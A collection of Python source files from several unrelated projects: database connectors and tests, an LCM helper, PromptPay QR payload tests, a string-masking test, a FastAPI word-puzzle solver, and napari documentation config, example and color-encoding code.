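A minimal sketch of `insert_into_table` against an in-memory SQLite database, mirroring what the package's own tests do further below; it assumes `dsdbmanager` is installed with a SQLAlchemy version it supports (table reflection via `autoload`), and the table name and columns are made up for illustration.

```python
import pandas as pd
import sqlalchemy as sa

from dsdbmanager.dbobject import insert_into_table

# Throwaway in-memory engine and table (names are illustrative).
engine = sa.create_engine("sqlite:///")
metadata = sa.MetaData()
colors = sa.Table(
    "colors",
    metadata,
    sa.Column("name", sa.String(50), primary_key=True),
    sa.Column("hex_code", sa.String(7)),
)
colors.create(engine)

df = pd.DataFrame({"name": ["red", "blue"], "hex_code": ["#ff0000", "#0000ff"]})
inserted = insert_into_table(df, "colors", engine, schema=None)
print(inserted)  # 2
```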
#### File: dsdbmanager/dsdbmanager/mssql_.py
```python
import typing
import sqlalchemy as sa
from .configuring import ConfigFilesManager
from .exceptions_ import MissingFlavor, MissingDatabase, MissingPackage
host_type = typing.Dict[str, typing.Dict[str, typing.Dict[str, str]]]
class Mssql:
def __init__(self, db_name: str, host_dict: host_type = None):
"""
:param db_name: database name
:param host_dict: optional database info with host, ports etc
"""
self.db_name = db_name
self.host_dict: host_type = ConfigFilesManager(
).get_hosts() if not host_dict else host_dict
if not self.host_dict or 'mssql' not in self.host_dict:
raise MissingFlavor("No databases available for mssql", None)
self.host_dict = self.host_dict.get('mssql').get(self.db_name, {})
if not self.host_dict:
raise MissingDatabase(
f"{self.db_name} has not been added for mssql", None)
def create_engine(self, user: str = None, pwd: str = None, **kwargs):
"""
:param user: username
:param pwd: password
:param kwargs: for compatibility/additional sqlalchemy create_engine kwargs
:return: sqlalchemy engine
"""
try:
import pymssql
except ImportError as e:
raise MissingPackage(
"You need the pymssql package to initiate connection", e
)
host = self.host_dict.get('host')
if 'port' not in self.host_dict:
if (
'use_dbname_to_connect' in self.host_dict and
not self.host_dict['use_dbname_to_connect']
):
return sa.create_engine(f'mssql+pymssql://{user}:{pwd}@{host}/', **kwargs)
else:
return sa.create_engine(f'mssql+pymssql://{user}:{pwd}@{host}/{self.db_name}', **kwargs)
port = self.host_dict.get('port')
if (
'use_dbname_to_connect' in self.host_dict and
not self.host_dict['use_dbname_to_connect']
):
            return sa.create_engine(f'mssql+pymssql://{user}:{pwd}@{host}:{port}/', **kwargs)
else:
            return sa.create_engine(f'mssql+pymssql://{user}:{pwd}@{host}:{port}/{self.db_name}', **kwargs)
```
#### File: dsdbmanager/test/test_connectors.py
```python
import unittest
from dsdbmanager.mssql_ import Mssql
from dsdbmanager.mysql_ import Mysql
from dsdbmanager.oracle_ import Oracle
from dsdbmanager.teradata_ import Teradata
from dsdbmanager.snowflake_ import Snowflake
from dsdbmanager.exceptions_ import MissingFlavor, MissingDatabase, MissingPackage
class TestConnectors(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.host_dict = {
'oracle': {
'database1': {
'name': 'database1',
'host': 'somehost',
'port': 0000
}
},
'teradata': {
'database1': {
'name': 'database1',
'host': 'somehost',
}
},
'mssql': {
'database1': {
'name': 'database1',
'host': 'somehost',
'port': 0000
}
},
'mysql': {
'database1': {
'name': 'database1',
'host': 'somehost',
'port': 0000
}
},
'snowflake': {
'database1': {
'name': 'database1',
'host': 'somehost',
'port': 0000
}
},
}
@classmethod
def tearDownClass(cls):
pass
def test_connectors(self):
for name, connector in zip(
[
'oracle',
'mysql',
'mssql',
'teradata',
'snowflake'
],
[
Oracle,
Mysql,
Mssql,
Teradata,
Snowflake
]):
with self.subTest(flavor=name):
# test with host improper host file. should raise MissingFlavor
with self.assertRaises(MissingFlavor):
_ = connector('database1', {'host': 'dummy'})
# test for database that has not been added
with self.assertRaises(MissingDatabase):
_ = connector('database2', self.host_dict)
# test for database added
obj = connector('database1', self.host_dict)
self.assertTrue(hasattr(obj, 'create_engine'))
# this is only useful in an environment where none of the extra packages are available
# with self.assertRaises(MissingPackage):
# obj.create_engine()
if __name__ == '__main__':
unittest.main()
```
#### File: dsdbmanager/test/test_dbobject.py
```python
import json
import unittest
import pathlib
import tempfile
import contextlib
import pandas as pd
import sqlalchemy as sa
import sqlalchemy.exc as exc
from dsdbmanager.dbobject import (
util_function,
insert_into_table,
update_on_table,
table_middleware,
DbMiddleware,
DsDbManager,
TableMeta,
TableInsert,
TableUpdate
)
from dsdbmanager.exceptions_ import (
BadArgumentType,
NoSuchColumn,
NotImplementedFlavor,
EmptyHostFile,
MissingFlavor
)
from dsdbmanager.configuring import ConfigFilesManager
class TestDbObject(unittest.TestCase):
@classmethod
def setUpClass(cls):
metadata = sa.MetaData()
cls.currency_table = sa.Table(
'currency',
metadata,
sa.Column(
'denomination',
sa.String(100),
primary_key=True
),
sa.Column(
'abbreviation',
sa.String(20),
primary_key=True
),
sa.Column(
'countries',
sa.String(500),
primary_key=True
)
)
cls.country_table = sa.Table(
'country',
metadata,
sa.Column(
'country',
sa.String(20),
primary_key=True
),
sa.Column(
'continent',
sa.String(20)
)
)
cls.engine_function = lambda _: sa.create_engine("sqlite:///")
cls.host = {
'oracle': {
'mydatabase': {
'name': 'mydatabase',
'host': 'localhost',
'sid': 'pyt'
},
'newdatabase': {
'name': 'newdatabase',
'host': 'localhost',
'sid': 'pyt',
'schema': 'schemo'
}
}
}
@classmethod
@contextlib.contextmanager
def generate_path(cls, suffix=None) -> pathlib.Path:
try:
temp = tempfile.NamedTemporaryFile(suffix=suffix) if suffix else tempfile.NamedTemporaryFile()
yield pathlib.Path(temp.name)
except OSError as _:
temp = None
finally:
if temp is not None:
temp.close()
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
self.engine: sa.engine.Engine = self.engine_function()
self.currency_table.create(self.engine)
self.country_table.create(self.engine)
def tearDown(self):
self.engine.dispose()
def test_util_function(self):
"""
1) check that the tables are in the engine
2) check that the output of the function are sqlalchemy tables
3) check that the wrong table name yields an error
:return:
"""
self.assertIn(self.currency_table.name, self.engine.table_names())
self.assertIn(self.country_table.name, self.engine.table_names())
self.assertIsInstance(
util_function(
table_name=self.country_table.name,
engine=self.engine,
schema=None
),
sa.Table
)
with self.assertRaises(exc.NoSuchTableError):
util_function(
table_name='not_there',
engine=self.engine,
schema=None
)
def test_insert_into_table(self):
"""
:return:
"""
df = pd.DataFrame(
{
'denomination': ['United States Dollar', 'West African Franc CFA'],
'abbreviation': ['USD', 'Franc CFA'],
'countries': ['U.S.A', "Benin, Togo, Burkina Faso, Guinea-Bissau, Cote D'Ivoire, Mali, Niger, Senegal"]
}
)
inserted = insert_into_table(
df=df,
table_name=self.currency_table.name,
engine=self.engine,
schema=None
)
read_df = pd.read_sql(
self.currency_table.name,
self.engine
)
self.assertEqual(inserted, len(df))
self.assertEqual(inserted, len(read_df))
for column in (column.name for column in self.currency_table.columns):
with self.subTest(column=column):
self.assertIn(column, read_df.columns)
def test_update_on_table(self):
"""
:return:
"""
# records to insert
country = [
{
'country': 'U.S.A',
'continent': 'North America'
},
{
'country': 'Benin',
'continent': 'Africa'
},
{
'country': 'Japan',
'continent': 'East Asia'
}
]
# execute insert
insert = self.engine.execute(
self.country_table.insert(),
country
)
insert.close()
# update using tuples as keys
us_update = pd.DataFrame(
{
'country': ['U.S.A'],
'continent': ['America']
}
)
updated = update_on_table(
df=us_update,
keys=('country',),
values=('continent',),
table_name=self.country_table.name,
engine=self.engine,
schema=None
)
us_current_value = self.engine.execute(
sa.select([self.country_table.c['continent']]).where(
self.country_table.c['country'] == 'U.S.A'
)
).fetchall()
self.assertEqual(updated, 1)
self.assertEqual(updated, len(us_current_value))
self.assertEqual(us_current_value[0][0], us_update.loc[0, 'continent'])
# update using dictionary as keys
japan_update = pd.DataFrame(
{
'the country': ['Japan'],
'the continent': ['Asia']
}
)
updated = update_on_table(
df=japan_update,
keys={'country': 'the country'},
values={'continent': 'the continent'},
table_name=self.country_table.name,
engine=self.engine,
schema=None
)
japan_current_value = self.engine.execute(
sa.select([self.country_table.c['continent']]).where(
self.country_table.c['country'] == 'Japan'
)
).fetchall()
self.assertEqual(updated, 1)
self.assertEqual(updated, len(japan_current_value))
self.assertEqual(japan_current_value[0][0], japan_update.loc[0, 'the continent'])
# errors on providing the wrong type of arguments for key etc
with self.assertRaises(BadArgumentType):
update_on_table(
df=japan_update,
keys='country',
values='continent',
table_name=self.country_table.name,
engine=self.engine,
schema=None
)
def test_table_middleware(self):
"""
:return:
"""
read_from_currency_table = table_middleware(
engine=self.engine,
table=self.currency_table.name
)
currencies = [
{
'denomination': 'US Dollar',
'abbreviation': 'USD',
'countries': 'U.S.A'
},
{
'denomination': 'Euro',
'abbreviation': 'EUR',
'countries': 'A bunch'
}
]
insert = self.engine.execute(
self.currency_table.insert(),
currencies
)
insert.close()
self.assertEqual(read_from_currency_table().shape, (len(currencies), 3))
self.assertEqual(read_from_currency_table(rows=1).shape, (1, 3))
self.assertEqual(read_from_currency_table(rows=1, columns=('abbreviation', 'countries')).shape, (1, 2))
self.assertEqual(read_from_currency_table(abbreviation='USD').shape, (1, 3))
self.assertTrue(read_from_currency_table(abbreviation='FCFA').empty)
with self.assertWarnsRegex(UserWarning, r"Columns \[made_up, not there\] are not in table currency"):
read_with_warning = read_from_currency_table(columns=('abbreviation', 'countries', 'not there', 'made_up'))
self.assertEqual(read_with_warning.shape, (len(currencies), 2))
# query bad columns
with self.assertRaises(NoSuchColumn):
_ = read_from_currency_table(columns=('madeup', 'made up'))
def test_dbmiddleware(self):
"""
:return:
"""
with DbMiddleware(self.engine, connect_only=False, schema=None) as dbm:
for attr in (
self.currency_table.name,
self.country_table.name,
'sqlalchemy_engine',
'_metadata',
'_insert',
'_update'
):
with self.subTest(attribute=attr):
self.assertTrue(hasattr(dbm, attr))
self.assertIsInstance(dbm._metadata, TableMeta)
self.assertIsInstance(dbm._insert, TableInsert)
self.assertIsInstance(dbm._update, TableUpdate)
def test_dsdbmanager(self):
with self.assertRaises(NotImplementedFlavor):
_ = DsDbManager('somemadeupflavor')
with self.generate_path(suffix='.json') as hp, self.generate_path(
suffix='.json') as cp, self.generate_path() as kp:
c = ConfigFilesManager(
hp,
cp,
kp
)
# test empty host file
with hp.open('w') as f:
json.dump({}, f)
with self.assertRaises(EmptyHostFile):
_ = DsDbManager('oracle', c)
# test with actual host data
with hp.open('w') as f:
json.dump(self.host, f)
dbobject = DsDbManager('oracle', c)
# test for missing flavor
with self.assertRaises(MissingFlavor):
_ = DsDbManager('teradata', c)
# some properties must be there by default
for attribute in [
'_flavor',
'_config_file_manager',
'_host_dict',
'_available_databases',
'_schemas_per_databases',
'_connection_object_creator',
]:
with self.subTest(attribute=attribute):
self.assertTrue(hasattr(dbobject, attribute))
# properties based on host file
for host_database in self.host.get('oracle'):
with self.subTest(host_database=host_database):
self.assertTrue(hasattr(dbobject, host_database))
# the host_dict should be the same dictionary as host
self.assertEqual(self.host, dbobject._host_dict)
# two available databases and two schemas
self.assertEqual(len(dbobject._available_databases), 2)
self.assertEqual(len(dbobject._schemas_per_databases), 2)
self.assertEqual(dbobject._available_databases, ['mydatabase', 'newdatabase'])
self.assertEqual(dbobject._schemas_per_databases, [None, 'schemo'])
# TODO - test TableMeta, TableInsert, TableUpdate: check for keyerror etc
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jojoduquartier/Python",
"score": 4
} |
#### File: Python/maths/find_lcm.py
```python
def find_lcm(num_1, num_2):
"""
Returns the least common multiple of two integers.
:param x: any integer
:param y: any integer
:return: integer z such that remainder(z/x) == 0 and remainder(z/y) == 0
"""
max = num_1 if num_1 > num_2 else num_2
lcm = max
while (True):
if ((lcm % num_1 == 0) and (lcm % num_2 == 0)):
break
lcm += max
return lcm
def lcm(x: int, y: int):
"""
Returns the least common multiple of two integers.
:param x: any integer
:param y: any integer
:return: integer z such that remainder(z/x) == 0 and remainder(z/y) == 0
Not necessarily faster solution, just a different solution using filter
"""
# if either number is 0 then lcm should be 0
if x == 0 or y == 0:
return 0
# simple algorithm is to return the first multiple of x that is also a multiple of y
# the built in filter function is great for such tasks
# note that we use multiples of the large number as it makes the generator length smaller
min_ = min(x, y)
max_ = max(x, y)
return next(filter(lambda i: i % min_ == 0, (max_ * j for j in range(1, min_ + 1))))
def main():
num_1 = 12
num_2 = 76
print(find_lcm(num_1, num_2))
print(lcm(num_1, num_2))
if __name__ == '__main__':
main()
``` |
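For comparison, a gcd-based sketch using only the standard library; this is an alternative formulation, not part of the file above.

```python
from math import gcd


def lcm_via_gcd(x: int, y: int) -> int:
    """Least common multiple via the identity lcm(x, y) * gcd(x, y) == |x * y|."""
    if x == 0 or y == 0:
        return 0
    return abs(x * y) // gcd(x, y)


assert lcm_via_gcd(12, 76) == 228  # matches find_lcm(12, 76) and lcm(12, 76)
```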
{
"source": "jojoee/promptpay",
"score": 2
} |
#### File: promptpay/tests/test_qrcode.py
```python
from promptpay import qrcode
import os.path
class TestSanitizeTarget:
def test_normal(self):
# phone
assert qrcode.sanitize_target(target="0801234567") == "0801234567"
# national id
assert qrcode.sanitize_target(target="1111111111111") == "1111111111111"
# tax id
assert qrcode.sanitize_target(target="0123456789012") == "0123456789012"
# ewallet
assert qrcode.sanitize_target(target="012345678901234") == "012345678901234"
def test_with_dash(self):
# phone
assert qrcode.sanitize_target(target="080-123-4567") == "0801234567"
# national id
assert qrcode.sanitize_target(target="1-1111-11111-11-1") == "1111111111111"
def test_with_international_format(self):
assert qrcode.sanitize_target(target="+66-89-123-4567") == "66891234567"
class TestFormatTarget:
def test_normal(self):
# phone
assert qrcode.format_target("0899999999") == "0066899999999"
# national id
assert qrcode.format_target("1234567890123") == "1234567890123"
def test_with_dash(self):
assert qrcode.format_target("089-999-9999") == "0066899999999"
def test_with_zero_leading(self):
# tax id which is start with 0
assert qrcode.format_target("0123456789012") == "0123456789012"
class TestFormatAmount:
def test_normal(self):
assert qrcode.format_amount(10.23) == "10.23"
def test_number_without_decimal(self):
assert qrcode.format_amount(10) == "10.00"
def test_number_with_more_than_two_decimal_number(self):
assert qrcode.format_amount(1337.1337) == "1337.13"
assert qrcode.format_amount(1337.1387) == "1337.14"
class TestChecksum:
def test_normal(self):
assert qrcode.checksum("00020101021129370016A000000677010111011300660000000005802TH53037646304") == "8956"
assert qrcode.checksum("00020101021129370016A000000677010111011300668999999995802TH53037646304") == "FE29"
class TestFormat:
def test_normal(self):
assert qrcode.format("00", "01") == "000201"
assert qrcode.format("05", "420") == "0503420"
class TestGeneratePayload:
def test_local_phone_number(self):
assert qrcode.generate_payload(
id="0801234567") == "00020101021129370016A000000677010111011300668012345675802TH530376463046197"
assert qrcode.generate_payload(
id="0899999999") == "00020101021129370016A000000677010111011300668999999995802TH53037646304FE29"
assert qrcode.generate_payload(
id="0891234567") == "00020101021129370016A000000677010111011300668912345675802TH5303764630429C1"
assert qrcode.generate_payload(
id="0000000000") == "00020101021129370016A000000677010111011300660000000005802TH530376463048956"
def test_local_phone_number_with_dash(self):
assert qrcode.generate_payload(
id="080-123-4567") == "00020101021129370016A000000677010111011300668012345675802TH530376463046197"
def test_local_phone_number_with_international_format(self):
assert qrcode.generate_payload(
id="+66-89-123-4567") == "00020101021129370016A000000677010111011300668912345675802TH5303764630429C1"
def test_national_id_number(self):
assert qrcode.generate_payload(
id="1111111111111") == "00020101021129370016A000000677010111021311111111111115802TH530376463047B5A"
assert qrcode.generate_payload(
id="1234567890123") == "00020101021129370016A000000677010111021312345678901235802TH53037646304EC40"
def test_national_id_number_with_dash(self):
assert qrcode.generate_payload(
id="1-1111-11111-11-1") == "00020101021129370016A000000677010111021311111111111115802TH530376463047B5A"
def test_tax_id(self):
assert qrcode.generate_payload(
id="0123456789012") == "00020101021129370016A000000677010111021301234567890125802TH530376463040CBD"
def test_ewallet_id(self):
# eWallet ID, KPlus ID
assert qrcode.generate_payload(
id="012345678901234") == "00020101021129390016A00000067701011103150123456789012345802TH530376463049781"
assert qrcode.generate_payload(
id="004999000288505") == "00020101021129390016A00000067701011103150049990002885055802TH530376463041521"
# KPlus shop ID
assert qrcode.generate_payload(
id="004000006579718") == "00020101021129390016A00000067701011103150040000065797185802TH53037646304FBB5"
def test_amount_setting(self):
# phone number
assert qrcode.generate_payload(
id="000-000-0000",
amount=4.22) == "00020101021229370016A000000677010111011300660000000005802TH530376454044.226304E469"
assert qrcode.generate_payload(
id="089-123-4567",
amount=13371337.75) == "00020101021229370016A000000677010111011300668912345675802TH5303764541113371337.756304B7D7"
# national id
assert qrcode.generate_payload(
id="1234567890123",
amount=420) == "00020101021229370016A000000677010111021312345678901235802TH53037645406420.006304BF7B"
# eWallet ID, KPlus ID
assert qrcode.generate_payload(
id="004999000288505",
amount=100.25) == "00020101021229390016A00000067701011103150049990002885055802TH53037645406100.256304369A"
# KPlus shop ID
assert qrcode.generate_payload(
id="004000006579718",
amount=200.50) == "00020101021229390016A00000067701011103150040000065797185802TH53037645406200.5063048A37"
class TestToImage:
def test_normal(self):
payload = qrcode.generate_payload("0841234567")
img = qrcode.to_image(payload)
assert type(img).__name__ == "PilImage"
class TestToFile:
def test_normal(self):
payload = qrcode.generate_payload("0841234567")
filepath = "./exported-qrcode-file.png"
qrcode.to_file(payload, filepath)
assert os.path.exists(filepath)
``` |
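The API exercised by these tests can be used directly as below; the expected payload string is taken from the amount test above, and the output path is arbitrary.

```python
from promptpay import qrcode

# Build a PromptPay payload for a phone number with a fixed amount.
payload = qrcode.generate_payload(id="089-123-4567", amount=13371337.75)
print(payload)
# "00020101021229370016A000000677010111011300668912345675802TH5303764541113371337.756304B7D7"

# Render it as a QR code image file (path is arbitrary).
qrcode.to_file(payload, "./exported-qrcode-file.png")
```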
{
"source": "jojoee/strblackout",
"score": 3
} |
#### File: strblackout/tests/test_strblackout.py
```python
import unittest
from strblackout import blackout
class TestBlackout(unittest.TestCase):
def test_blackout_default(self):
self.assertEqual(blackout("123456789"), "123456789")
def test_blackout_left(self):
self.assertEqual(blackout("123456789", left=5), "*****6789")
def test_blackout_right(self):
self.assertEqual(blackout("123456789", right=3), "123456***")
def test_blackout_replacement(self):
self.assertEqual(blackout("123456789", left=3, replacement="x"), "xxx456789")
def test_blackout_short_text(self):
self.assertEqual(blackout("123", left=10, right=20), "***")
if __name__ == "__main__":
unittest.main()
``` |
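A behavioral sketch of `blackout` inferred from the tests above; this is not the package's actual implementation, just one function that satisfies the asserted behaviour.

```python
def blackout_sketch(text: str, left: int = 0, right: int = 0, replacement: str = "*") -> str:
    """Mask `left` leading and `right` trailing characters (behaviour inferred from the tests)."""
    n = len(text)
    left = min(left, n)
    right = min(right, n - left)
    return replacement * left + text[left:n - right] + replacement * right


assert blackout_sketch("123456789") == "123456789"
assert blackout_sketch("123456789", left=5) == "*****6789"
assert blackout_sketch("123456789", right=3) == "123456***"
assert blackout_sketch("123456789", left=3, replacement="x") == "xxx456789"
assert blackout_sketch("123", left=10, right=20) == "***"
```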
{
"source": "jojoee/wordcookies",
"score": 2
} |
#### File: wordcookies/web/main.py
```python
import json
from fastapi import FastAPI
from fastapi.staticfiles import StaticFiles
from starlette.responses import FileResponse # Use this to serve a public/index.html
from simplekv.memory.redisstore import RedisStore
from simplekv.fs import FilesystemStore
import redis
from config import REDIS_HOST, REDIS_PORT, REDIS_DB, REDIS_PASS, IS_DEBUG, PORT
import uvicorn
from wordcookies import game
# init FastAPI
app = FastAPI()
app.mount("/public", StaticFiles(directory="./public"), name="public")
# init cache
# TODO: move to constant
text_domain = "wordcookies"
if REDIS_HOST == "":
cache_path = "./cache"
print("cache storage: file, inside %s" % cache_path)
store = FilesystemStore(cache_path)
else:
print("cache storage: Redis, host %s" % REDIS_HOST)
store = RedisStore(redis.StrictRedis(REDIS_HOST, REDIS_PORT, REDIS_DB, REDIS_PASS))
@app.get("/")
def read_index():
return FileResponse("./public/index.html")
@app.get("/healthcheck")
def read_healthcheck():
return {"message": "ok"}
@app.get("/404")
def read_404():
return {"Not": "Found"}
@app.get("/api/solve/{s}")
def read_input(s: str):
global text_domain
chars = game.clean(s)
key_name = "%s_%s" % (text_domain, "".join(chars))
g = None
try:
cached_data = store.get(key_name)
print("key_name: %s, found cached_data" % key_name)
        g = json.loads(cached_data.decode("utf-8"))
except Exception as e:
print("key_name: %s, not found cached_data" % str(e))
answers = game.get_possible_answers(chars)
g = game.group(answers)
# save cache
store.put(key_name, json.dumps(g).encode("utf-8"))
return {"code": 200, "message": "", "data": g}
if __name__ == "__main__":
uvicorn.run("main:app", host="0.0.0.0", port=PORT, debug=IS_DEBUG, reload=IS_DEBUG)
``` |
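A hedged smoke-test sketch for the endpoints above using FastAPI's `TestClient`; it assumes `config.py` resolves in the working directory (with `REDIS_HOST == ""` the filesystem cache is used), and the board string passed to `/api/solve/` is arbitrary.

```python
from fastapi.testclient import TestClient

from main import app  # assumes the app's config module resolves

client = TestClient(app)

response = client.get("/healthcheck")
assert response.json() == {"message": "ok"}

# Solve an arbitrary board; the grouped answers come back under "data".
response = client.get("/api/solve/aelpp")
body = response.json()
print(body["code"], body["data"])
```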
{
"source": "jojoelfe/napari",
"score": 2
} |
#### File: napari/docs/conf.py
```python
from importlib import import_module
from pathlib import Path
import qtgallery
from jinja2.filters import FILTERS
import napari
release = napari.__version__
if "dev" in release:
version = "dev"
else:
version = release
# -- Project information -----------------------------------------------------
project = 'napari'
copyright = '2022, The napari team'
author = 'The napari team'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
autosummary_generate = True
autosummary_imported_members = True
comments_config = {'hypothesis': False, 'utterances': False}
# execution_allow_errors = False
# execution_excludepatterns = []
# execution_in_temp = False
# execution_timeout = 30
extensions = [
"sphinx.ext.napoleon",
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.intersphinx",
"sphinx_external_toc",
"sphinx_tabs.tabs",
'myst_nb',
# "sphinx_comments",
"sphinx_panels",
"sphinx.ext.viewcode",
"sphinx_gallery.gen_gallery",
]
external_toc_path = "_toc.yml"
external_toc_exclude_missing = False
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'napari'
html_theme_options = {
"external_links": [
{"name": "napari hub", "url": "https://napari-hub.org"}
],
"github_url": "https://github.com/napari/napari",
"navbar_start": ["navbar-project"],
"navbar_end": ["navbar-icon-links"],
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
html_logo = "images/logo.png"
html_sourcelink_suffix = ''
html_title = 'napari'
html_css_files = [
'custom.css',
]
intersphinx_mapping = {
'python': ['https://docs.python.org/3', None],
'numpy': ['https://numpy.org/doc/stable/', None],
'napari_plugin_engine': [
'https://napari-plugin-engine.readthedocs.io/en/latest/',
'https://napari-plugin-engine.readthedocs.io/en/latest/objects.inv',
],
'magicgui': [
'https://napari.org/magicgui/',
'https://napari.org/magicgui/objects.inv',
],
}
jupyter_cache = ''
jupyter_execute_notebooks = 'auto'
myst_enable_extensions = [
'colon_fence',
'dollarmath',
'substitution',
'tasklist',
]
nb_output_stderr = 'show'
panels_add_bootstrap_css = False
pygments_style = 'solarized-dark'
suppress_warnings = ['myst.header', 'etoc.toctree']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = [
'_build',
'Thumbs.db',
'.DS_Store',
'.jupyter_cache',
'jupyter_execute',
]
napoleon_custom_sections = [('Events', 'params_style')]
def reset_napari_theme(gallery_conf, fname):
from napari.settings import get_settings
settings = get_settings()
settings.appearance.theme = 'dark'
qtgallery.reset_qapp(gallery_conf, fname)
sphinx_gallery_conf = {
'examples_dirs': '../examples', # path to your example scripts
'gallery_dirs': 'gallery', # path to where to save gallery generated output
'filename_pattern': '/*.py',
'ignore_pattern': 'README.rst|/*_.py',
'default_thumb_file': Path(__file__).parent.parent
/ 'napari'
/ 'resources'
/ 'logo.png',
'plot_gallery': True,
'download_all_examples': False,
'min_reported_time': 10,
'only_warn_on_example_error': True,
'image_scrapers': (qtgallery.qtscraper,),
'reset_modules': (reset_napari_theme,),
}
def setup(app):
"""Ignore .ipynb files.
    Prevents Sphinx from complaining about multiple files found for a document
    when generating the gallery.
"""
app.registry.source_suffix.pop(".ipynb", None)
def get_attributes(item, obj, modulename):
"""Filters attributes to be used in autosummary.
Fixes import errors when documenting inherited attributes with autosummary.
"""
module = import_module(modulename)
if hasattr(getattr(module, obj), item):
return f"~{obj}.{item}"
else:
return ""
FILTERS["get_attributes"] = get_attributes
```
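The `get_attributes` helper above is registered as a Jinja filter for the autosummary templates. A minimal sketch of what it returns when called directly (illustrative only; the `numpy.ndarray` example is an arbitrary choice, not something the napari docs build actually does):
```python
# Illustrative only: exercising the conf.py helper as a plain function.
from importlib import import_module

def get_attributes(item, obj, modulename):
    """Return an autosummary-style reference if the attribute exists, else ''."""
    module = import_module(modulename)
    if hasattr(getattr(module, obj), item):
        return f"~{obj}.{item}"
    return ""

print(get_attributes("shape", "ndarray", "numpy"))         # -> ~ndarray.shape
print(get_attributes("no_such_attr", "ndarray", "numpy"))  # -> (empty string)
```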
#### File: napari/examples/tracks_3d_with_graph.py
```python
import napari
import numpy as np
def _circle(r, theta):
x = r * np.cos(theta)
y = r * np.sin(theta)
return x, y
def tracks_3d_merge_split():
"""Create tracks with splitting and merging."""
timestamps = np.arange(300)
def _trajectory(t, r, track_id):
theta = t * 0.1
x, y = _circle(r, theta)
z = np.zeros(x.shape)
tid = np.ones(x.shape) * track_id
return np.stack([tid, t, z, y, x], axis=1)
trackA = _trajectory(timestamps[:100], 30.0, 0)
trackB = _trajectory(timestamps[100:200], 10.0, 1)
trackC = _trajectory(timestamps[100:200], 50.0, 2)
trackD = _trajectory(timestamps[200:], 30.0, 3)
data = [trackA, trackB, trackC, trackD]
tracks = np.concatenate(data, axis=0)
tracks[:, 2:] += 50.0 # centre the track at (50, 50, 50)
graph = {1: 0, 2: [0], 3: [1, 2]}
features = {'time': tracks[:, 1]}
return tracks, features, graph
tracks, features, graph = tracks_3d_merge_split()
vertices = tracks[:, 1:]
viewer = napari.Viewer(ndisplay=3)
viewer.add_points(vertices, size=1, name='points', opacity=0.3)
viewer.add_tracks(tracks, features=features, graph=graph, name='tracks')
if __name__ == '__main__':
napari.run()
```
#### File: layers/utils/_color_encoding.py
```python
from typing import Any, Literal, Optional, Tuple, Union
import numpy as np
from pydantic import Field, parse_obj_as, validator
from typing_extensions import Protocol, runtime_checkable
from ...utils import Colormap
from ...utils.colormaps import ValidColormapArg, ensure_colormap
from ...utils.colormaps.categorical_colormap import CategoricalColormap
from ...utils.colormaps.standardize_color import transform_color
from ...utils.translations import trans
from .color_transformations import ColorType
from .style_encoding import (
StyleEncoding,
_ConstantStyleEncoding,
_DerivedStyleEncoding,
_ManualStyleEncoding,
)
class ColorValue(np.ndarray):
"""A 4x1 array that represents one RGBA color value."""
@classmethod
def __get_validators__(cls):
yield cls.validate_type
@classmethod
def validate_type(cls, val):
return transform_color(val)[0]
class ColorArray(np.ndarray):
"""An Nx4 array where each row of N represents one RGBA color value."""
@classmethod
def __get_validators__(cls):
yield cls.validate_type
@classmethod
def validate_type(cls, val):
return (
np.empty((0, 4), np.float32)
if len(val) == 0
else transform_color(val)
)
@runtime_checkable
class ColorEncoding(StyleEncoding[ColorValue, ColorArray], Protocol):
"""Encodes colors from features."""
@classmethod
def __get_validators__(cls):
yield cls.validate
@classmethod
def validate(
cls, value: Union['ColorEncoding', dict, str, ColorType]
) -> 'ColorEncoding':
"""Validates and coerces a value to a ColorEncoding.
Parameters
----------
value : ColorEncodingArgument
The value to validate and coerce.
If this is already a ColorEncoding, it is returned as is.
If this is a dict, then it should represent one of the built-in color encodings.
        If this is a string, then a DirectColorEncoding is returned.
        If this is a single color, a ConstantColorEncoding is returned.
If this is a sequence of colors, a ManualColorEncoding is returned.
Returns
-------
ColorEncoding
Raises
------
TypeError
If the value is not a supported type.
ValidationError
If the value cannot be parsed into a ColorEncoding.
"""
if isinstance(value, ColorEncoding):
return value
if isinstance(value, dict):
return parse_obj_as(
Union[
ConstantColorEncoding,
ManualColorEncoding,
DirectColorEncoding,
NominalColorEncoding,
QuantitativeColorEncoding,
],
value,
)
if isinstance(value, str):
return DirectColorEncoding(feature=value, fallback=DEFAULT_COLOR)
try:
color_array = ColorArray.validate_type(value)
except (ValueError, AttributeError, KeyError):
raise TypeError(
trans._(
'value should be a ColorEncoding, a dict, a string, a color, a sequence of colors, or None',
deferred=True,
)
)
if color_array.shape[0] == 1:
return ConstantColorEncoding(constant=value)
return ManualColorEncoding(array=color_array, default=DEFAULT_COLOR)
"""The default color to use, which may also be used a safe fallback color."""
DEFAULT_COLOR = ColorValue.validate_type('cyan')
class ConstantColorEncoding(_ConstantStyleEncoding[ColorValue, ColorArray]):
"""Encodes color values from a single constant color.
Attributes
----------
constant : ColorValue
The constant color RGBA value.
"""
encoding_type: Literal['ConstantColorEncoding'] = 'ConstantColorEncoding'
constant: ColorValue
class ManualColorEncoding(_ManualStyleEncoding[ColorValue, ColorArray]):
"""Encodes color values manually in an array attribute.
Attributes
----------
array : ColorArray
The array of color values. Can be written to directly to make
persistent updates.
default : ColorValue
The default color value.
"""
encoding_type: Literal['ManualColorEncoding'] = 'ManualColorEncoding'
array: ColorArray
default: ColorValue = Field(default_factory=lambda: DEFAULT_COLOR)
class DirectColorEncoding(_DerivedStyleEncoding[ColorValue, ColorArray]):
"""Encodes color values directly from a feature column.
Attributes
----------
feature : str
The name of the feature that contains the desired color values.
    fallback : ColorValue
The safe constant fallback color to use if the feature column
does not contain valid color values.
"""
